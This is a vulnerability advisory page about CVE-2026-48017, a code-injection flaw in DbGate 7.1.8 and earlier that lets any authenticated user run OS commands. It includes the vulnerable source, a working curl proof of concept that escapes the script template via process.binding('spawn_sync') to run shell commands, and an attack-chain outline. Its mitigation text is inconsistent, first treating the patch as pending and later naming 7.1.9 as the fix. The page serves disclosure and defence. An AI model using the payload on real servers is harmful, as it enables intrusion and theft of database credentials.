What is the CVSS score of CVE-2026-48017?

CVE-2026-48017 has a CVSS 3.1 base score of 8.8 (High). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.

Which versions of DbGate are affected by CVE-2026-48017?

DbGate database management tool (npm package dbgate-api) versions 7.1.8 and earlier contain a remote code execution vulnerability exploitable by any authenticated database user, creating a critical…. A patch is available.

How to fix or mitigate CVE-2026-48017?

Within 24 hours: Inventory all DbGate deployments running version 7.1.8 or earlier and restrict network access to the vulnerable endpoint (POST /runners/load-reader). Within 7 days: Implement compensating controls including network segmentation, endpoint monitoring, and request validation; establish patch readiness criteria. Within 30 days: Monitor vendor advisories for patch release and execute immediate upgrade to patched version upon availability, or discontinue DbGate use if patch delays exceed organizational risk tolerance.

DbGate CVE-2026-48017

HIGH

Code Injection (CWE-94)

2026-06-05 https://github.com/dbgate/dbgate

GHSA-hv83-ggc4-v385

Privilege Escalation Code Injection RCE Docker Node.js

8.8

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Source Code Evidence Fetched

Jun 05, 2026 - 17:18 vuln.today

Analysis Generated

Jun 05, 2026 - 17:18 vuln.today

CVE Published

Jun 05, 2026 - 16:39 nvd

HIGH 8.8

Blast Radius

ecosystem impact

† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth

2 npm packages depend on dbgate-api (2 direct, 0 indirect)

Ecosystem-wide dependent count for version 7.1.9.

DescriptionNVD

Summary

The POST /runners/load-reader endpoint in DbGate accepts a functionName parameter that is directly interpolated into a JavaScript code template without any sanitization or validation. An authenticated user (with basic access, no special permissions required) can inject arbitrary JavaScript code that executes on the server with full process privileges, bypassing the require=null sandbox restriction.

Details

The loadReader endpoint in packages/api/src/controllers/runners.js (line 353) takes a functionName parameter from the request body and passes it to compileShellApiFunctionName() which performs no sanitization:

Vulnerable code (permalink):

javascript

  loadReader_meta: true,
  async loadReader({ functionName, props }) {
    if (!platformInfo.isElectron) {
      if (props?.fileName && !checkSecureDirectories(props.fileName)) {
        return { errorMessage: 'DBGM-00289 Unallowed file' };
      }
    }
    const prefix = extractShellApiPlugins(functionName)
      .map(packageName => `// @require ${packageName}\n`)
      .join('');

    const promise = new Promise((resolve, reject) => {
      const runid = crypto.randomUUID();
      this.requests[runid] = { resolve, reject, exitOnStreamError: true };
      this.startCore(runid, loaderScriptTemplate(prefix, functionName, props, runid));
    });
    return promise;
  },

The loaderScriptTemplate at line 57-68 directly interpolates the compiled function name:

javascript

const loaderScriptTemplate = (prefix, functionName, props, runid) => `
${prefix}
const dbgateApi = require(process.env.DBGATE_API);
dbgateApi.initializeApiEnvironment();
${requirePluginsTemplate(extractShellApiPlugins(functionName, props))}
require=null;
async function run() {
const reader=await ${compileShellApiFunctionName(functionName)}(${JSON.stringify(props)});
const writer=await dbgateApi.collectorWriter({runid: '${runid}'});
await dbgateApi.copyStream(reader, writer);
}
dbgateApi.runScript(run);
`;

The compileShellApiFunctionName in packages/tools/src/packageTools.ts (line 30-35) performs no validation:

typescript

export function compileShellApiFunctionName(functionName) {
  const nsMatch = functionName.match(/^([^@]+)@([^@]+)/);
  if (nsMatch) {
    return `${_camelCase(nsMatch[2])}.shellApi.${nsMatch[1]}`;
  }
  return `dbgateApi.${functionName}`;
}

Two injection vectors:

Without @: The entire functionName is appended after dbgateApi. without sanitization
With @: The part before @ (nsMatch[1]) is appended after .shellApi. without sanitization (only the part after @ goes through _camelCase)

Although the script template sets require=null, the process global is still available. process.binding("spawn_sync") provides direct access to spawn child processes, completely bypassing the sandbox.

Compare with safe code in the same file (line 292):

javascript

  start_meta: true,
  async start({ script }, req) {
    // ...
    await testStandardPermission('run-shell-script', req);  // <-- Permission check!
    if (!platformInfo.allowShellScripting) {                 // <-- Platform check!
      return { errorMessage: 'DBGM-00286 Shell scripting is not allowed' };
    }
    // ...
  },

The start endpoint requires the run-shell-script permission and checks allowShellScripting. The loadReader endpoint has neither of these checks, making it a privilege escalation from any authenticated user to full RCE.

PoC

An authenticated user sends a POST request to /runners/load-reader with a crafted functionName:

bash

# The malicious functionName breaks out of the expression and injects
# process.binding("spawn_sync") to execute arbitrary commands.
# The // at the end comments out the remaining template code.

curl -X POST http://TARGET:3000/runners/load-reader \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <JWT_TOKEN>" \
  -d '{
    "functionName": "toString();var __r=process.binding(\"spawn_sync\").spawn({file:\"/bin/sh\",args:[\"/bin/sh\",\"-c\",\"id > /tmp/dbgate-rce-proof\"],envPairs:[],stdio:[{type:\"pipe\",readable:true,writable:false},{type:\"pipe\",readable:false,writable:true},{type:\"pipe\",readable:false,writable:true}]});dbgateApi.toString//",
    "props": {}
  }'

This generates the following JavaScript that is forked as a child process:

javascript

const dbgateApi = require(process.env.DBGATE_API);
dbgateApi.initializeApiEnvironment();
require=null;
async function run() {
const reader=await dbgateApi.toString();var __r=process.binding("spawn_sync").spawn({file:"/bin/sh",args:["/bin/sh","-c","id > /tmp/dbgate-rce-proof"],envPairs:[],stdio:[{type:"pipe",readable:true,writable:false},{type:"pipe",readable:false,writable:true},{type:"pipe",readable:false,writable:true}]});dbgateApi.toString//({})
// ... rest of template
}
dbgateApi.runScript(run);

After the request, /tmp/dbgate-rce-proof contains the output of id, confirming arbitrary command execution.

A standalone PoC script is available at: reports/cve-hunting/pocs/dbgate/rce_loadreader_functionname_injection.py

Impact

An authenticated user with basic access (no admin role, no run-shell-script permission required) can:

Execute arbitrary OS commands on the DbGate server with the privileges of the Node.js process
Read/write any file accessible to the process
Pivot to connected databases by reading connection credentials from DbGate's storage
Compromise the host system - in Docker deployments, this typically means root access within the container

This is particularly severe because:

No special permissions are required beyond basic authentication
The require=null sandbox is completely bypassed via process.binding("spawn_sync")
The loadReader endpoint lacks the permission checks present on the start endpoint
DbGate is commonly deployed as a web-accessible database management tool

AnalysisAI

Remote code execution in DbGate (npm package dbgate-api) versions 7.1.8 and earlier allows any authenticated user with basic access to execute arbitrary OS commands by injecting JavaScript into the functionName parameter of the POST /runners/load-reader endpoint. The flaw stems from unsanitized string interpolation into a server-side script template, and the require=null sandbox is bypassed via process.binding("spawn_sync"). …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon

Obtain low-privilege DbGate credentials

Delivery

Authenticate to DbGate API

Exploit

Send crafted POST to /runners/load-reader

Install

Inject JS via functionName parameter

Bypass require=null via process.binding('spawn_sync')

Execute

Execute shell commands as Node.js process

Impact

Exfiltrate DB credentials and pivot

Recon

Obtain low-privilege DbGate credentials

Delivery

Authenticate to DbGate API

Exploit

Send crafted POST to /runners/load-reader

Install

Inject JS via functionName parameter

Bypass require=null via process.binding('spawn_sync')

Execute

Execute shell commands as Node.js process

Impact

Exfiltrate DB credentials and pivot

Vulnerability AssessmentAI

Exploitation	Exploitation requires (1) network reachability to the DbGate HTTP API (default port 3000 or whatever the reverse proxy exposes), (2) a valid authenticated session - any account works, including a basic user with no admin role and without the `run-shell-script` permission, since the `loadReader` endpoint omits both the `testStandardPermission('run-shell-script', req)` check and the `platformInfo.allowShellScripting` gate that protect the sibling `start` endpoint, and (3) the ability to send a crafted JSON body to `POST /runners/load-reader` with a `functionName` value that breaks out of the `dbgateApi.<name>(...)` template. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	Real-world risk is high. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker who has obtained any low-privilege DbGate account (e.g., a basic read-only user, leaked credential, or self-registered account on a misconfigured deployment) sends a single `POST /runners/load-reader` request whose `functionName` field closes the templated expression and inserts `process.binding("spawn_sync").spawn(...)` to execute `/bin/sh -c <command>` on the server. Because the GHSA advisory ships a working PoC (including a Python script at `reports/cve-hunting/pocs/dbgate/rce_loadreader_functionname_injection.py`), turnkey exploitation is straightforward, and in typical Docker deployments the resulting shell runs as root inside the container with access to all configured database connection strings.
Remediation	Vendor-released patch: dbgate-api 7.1.9 - upgrade immediately via `npm install dbgate-api@7.1.9` (or pull the corresponding DbGate 7.1.9 Docker image / release from https://github.com/dbgate/dbgate/releases/tag/v7.1.9). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Inventory all DbGate deployments running version 7.1.8 or earlier and restrict network access to the vulnerable endpoint (POST /runners/load-reader). …

Threat intelligence, references, and detailed analysis are available after sign-in.